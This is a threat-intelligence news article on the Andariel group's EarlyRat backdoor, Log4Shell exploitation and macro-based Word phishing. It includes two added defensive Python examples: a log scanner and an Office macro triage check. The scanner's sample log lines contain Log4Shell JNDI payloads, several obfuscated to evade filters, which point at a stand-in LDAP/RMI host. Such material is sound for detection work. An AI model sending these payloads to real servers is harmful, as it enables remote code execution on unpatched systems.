The North Korea-aligned threat actor known as Andariel leveraged a previously undocumented piece of malware named EarlyRat in attacks exploiting the Log4j Log4Shell vulnerability last year.
“Andariel infects machines by executing the Log4j exploit, which, in turn, downloads further malware from a command-and-control (C2) server,” Kaspersky said in a new report.
Also called Silent Chollima and Stonefly, Andariel is associated with North Korea's Lab 110, the main hacking unit that also houses APT38 (aka BlueNoroff) and other subordinate elements, all of which are collectively tracked under the umbrella name Lazarus Group.
The threat actor, in addition to carrying out espionage attacks against foreign governments and military entities of strategic interest, is known to commit financially motivated cybercrime as an additional source of income for the sanctioned country.
Some of the major cyber weapons in its arsenal include the Maui ransomware and numerous remote access trojans and backdoors such as Dtrack (aka Valefor and Preft), NukeSped (aka Manuscrypt), MagicRAT, and YamaBot.
NukeSped contains features to create and kill processes and to move, read, and write files on infected hosts. Its use overlaps with a campaign tracked by the U.S. Cybersecurity and Infrastructure Security Agency (CISA) under the name TraderTraitor.
Andariel's exploitation of unpatched Log4Shell vulnerabilities in VMware Horizon servers was previously documented by the AhnLab Security Emergency Response Center (ASEC) and Cisco Talos in 2022.
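The initial access described above (a Log4Shell lookup string delivered to an exposed Log4j application, which then fetches the next stage from a C2 server) leaves a trace in the web or application logs that defenders can hunt for. The following is an added example, not code from Kaspersky's report or from any of the vendors named here: it scans constructed access-log lines for JNDI lookups and first collapses the common Log4j lookup tricks (`${lower:…}`, `${upper:…}`, and the `${…:-default}` fallback) that attackers use to hide the literal string `jndi`. The log lines, the IP addresses, and the URL paths are constructed for the example.

```python
import re

# Constructed sample access-log lines (not taken from the Kaspersky report).
# Line 1 is benign; lines 2-5 carry a JNDI lookup in the User-Agent field,
# with increasing obfuscation of the kind seen in real Log4Shell scanning.
SAMPLE_LOGS = [
    '10.0.0.5 - - [10/Dec/2021:12:00:01 +0000] "GET / HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '10.0.0.9 - - [10/Dec/2021:12:00:02 +0000] "GET /portal/login HTTP/1.1" 200 512 "-" "${jndi:ldap://203.0.113.7:1389/a}"',
    '10.0.0.9 - - [10/Dec/2021:12:00:03 +0000] "GET /portal/login HTTP/1.1" 200 512 "-" "${${lower:j}${upper:n}di:${lower:l}dap://203.0.113.7:1389/a}"',
    '10.0.0.9 - - [10/Dec/2021:12:00:04 +0000] "GET /portal/login HTTP/1.1" 200 512 "-" "${${::-j}${::-n}${::-d}${::-i}:rmi://203.0.113.7:1099/x}"',
    '10.0.0.9 - - [10/Dec/2021:12:00:05 +0000] "GET /portal/login HTTP/1.1" 200 512 "-" "${${env:NaN:-j}ndi:${sys:NaN:-l}dap://203.0.113.7/x}"',
]

# Each pattern matches only an innermost lookup (no "${" or "}" inside the
# braces), so repeated substitution resolves nesting from the inside out.
LOWER_RE = re.compile(r"\$\{lower:([^${}]*)\}")
UPPER_RE = re.compile(r"\$\{upper:([^${}]*)\}")
# "${anything:-default}" evaluates to "default" when the lookup fails;
# attackers abuse this with "${::-j}" or "${env:NaN:-j}" to spell out "jndi".
DEFAULT_RE = re.compile(r"\$\{[^${}]*?:-([^${}]*)\}")

# After de-obfuscation a lookup reads "jndi:<scheme>://<target>".
JNDI_RE = re.compile(r"jndi:([a-z]+)://([^\s}\"']+)", re.IGNORECASE)


def normalize_lookups(text: str, max_rounds: int = 32) -> str:
    """Collapse Log4j lookup tricks used to hide the string 'jndi'.

    Runs until the text stops changing or max_rounds is reached, so a
    pathological input cannot keep the scanner busy indefinitely.
    """
    for _ in range(max_rounds):
        new = LOWER_RE.sub(lambda m: m.group(1).lower(), text)
        new = UPPER_RE.sub(lambda m: m.group(1).upper(), new)
        new = DEFAULT_RE.sub(lambda m: m.group(1), new)
        if new == text:
            break
        text = new
    return text


def find_jndi(line: str):
    """Return (scheme, target) for every JNDI lookup in one log line."""
    return [(s.lower(), t) for s, t in JNDI_RE.findall(normalize_lookups(line))]


def scan_logs(lines):
    """Return (1-based line number, scheme, target) for each line carrying a JNDI lookup."""
    hits = []
    for n, line in enumerate(lines, start=1):
        for scheme, target in find_jndi(line):
            hits.append((n, scheme, target))
    return hits


if __name__ == "__main__":
    for n, scheme, target in scan_logs(SAMPLE_LOGS):
        print(f"line {n}: JNDI lookup via {scheme} -> {target}")
```

The target host in a hit is the attacker's LDAP or RMI listener, which is exactly the "further malware from a command-and-control server" step; pivot on it across proxy and DNS logs. The scanner only sees what was logged: a lookup string carried in a POST body or a header the server does not record will not appear, so it complements rather than replaces patching and a Log4j version inventory.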
The latest attack chain uncovered by Kaspersky indicates that EarlyRat is spread via phishing emails carrying lure Microsoft Word documents. When opened, the file prompts the recipient to enable macros; if they do, the embedded VBA code runs and downloads the trojan.
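A mail gateway or incident responder can flag this delivery method before the recipient ever sees the "enable macros" prompt, because an Office Open XML package that carries VBA declares it in its structure. The following is an added example, not code from Kaspersky's report or from the campaign: it builds two constructed minimal Word packages in memory (one macro-enabled, one not; the `vbaProject.bin` content is a placeholder, not a real VBA project) and triages a file by its magic bytes, the presence of a VBA part, and the macro-enabled content type. Reading the macro source itself requires MS-OVBA decompression, which this example leaves to a dedicated tool such as olevba.

```python
import io
import zipfile

# Legacy binary Office files (.doc) are OLE2 compound files with this header.
OLE2_MAGIC = b"\xd0\xcf\x11\xe0\xa1\xb1\x1a\xe1"
MACRO_CT = "application/vnd.ms-word.document.macroEnabled.main+xml"
PLAIN_CT = "application/vnd.openxmlformats-officedocument.wordprocessingml.document.main+xml"


def build_sample(with_macro: bool) -> bytes:
    """Constructed minimal OOXML package for the example (not a real document).

    The vbaProject.bin part is a placeholder byte string; a real one is an
    OLE2 container holding MS-OVBA-compressed module streams.
    """
    parts = [f'<Override PartName="/word/document.xml" ContentType="{MACRO_CT if with_macro else PLAIN_CT}"/>']
    if with_macro:
        parts.append('<Override PartName="/word/vbaProject.bin" ContentType="application/vnd.ms-office.vbaProject"/>')
    content_types = (
        '<?xml version="1.0" encoding="UTF-8"?>'
        '<Types xmlns="http://schemas.openxmlformats.org/package/2006/content-types">'
        + "".join(parts) + "</Types>"
    )
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as z:
        z.writestr("[Content_Types].xml", content_types)
        z.writestr("word/document.xml", "<w:document/>")
        if with_macro:
            z.writestr("word/vbaProject.bin", b"placeholder-vba-project")
    return buf.getvalue()


def triage(blob: bytes) -> dict:
    """Classify a Word attachment by container format and declared VBA content."""
    result = {"format": "unknown", "has_vba_part": False,
              "macro_content_type": False, "verdict": "unknown"}
    if blob.startswith(OLE2_MAGIC):
        # Legacy .doc: macros live in OLE streams, not in a zip part.
        result["format"] = "ole2"
        result["verdict"] = "legacy .doc: inspect OLE streams (e.g. olevba) for a VBA project"
        return result
    if not blob.startswith(b"PK"):
        return result
    try:
        with zipfile.ZipFile(io.BytesIO(blob)) as z:
            names = set(z.namelist())
            result["format"] = "ooxml"
            # The VBA project is stored as its own part inside the package.
            result["has_vba_part"] = any(n.lower().endswith("vbaproject.bin") for n in names)
            ct_xml = z.read("[Content_Types].xml").decode("utf-8", "replace") \
                if "[Content_Types].xml" in names else ""
            result["macro_content_type"] = MACRO_CT in ct_xml
    except zipfile.BadZipFile:
        return result
    if result["has_vba_part"] or result["macro_content_type"]:
        result["verdict"] = "macro-enabled: block or detonate before delivery"
    else:
        result["verdict"] = "no VBA project declared"
    return result


if __name__ == "__main__":
    for label, sample in (("docm", build_sample(True)), ("docx", build_sample(False))):
        print(label, triage(sample))
```

The check deliberately looks at both signals: a package whose content type says "macro-enabled" but has no VBA part, or the reverse, is itself worth a closer look. The file extension is ignored on purpose, since it is attacker-controlled.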
Described as a simple but limited backdoor, EarlyRat is designed to collect system information, exfiltrate it to a remote server, and execute arbitrary commands. It also shares a high degree of similarity with MagicRAT, although the two differ in tooling: EarlyRat is written with PureBasic, while MagicRAT uses the Qt framework.
Another characteristic of these intrusions is the use of legitimate tools such as 3Proxy, ForkDump, NTDSDumpEx, Powerline, and PuTTY to further the compromise of the target environment.
“Despite being an APT group, Lazarus is known to perform typical cybercrime tasks, such as deploying ransomware, which makes the cybercrime landscape even more complicated,” said Kaspersky. “In addition, the group uses a wide variety of specialized tools, constantly updating existing malware and developing new malware.”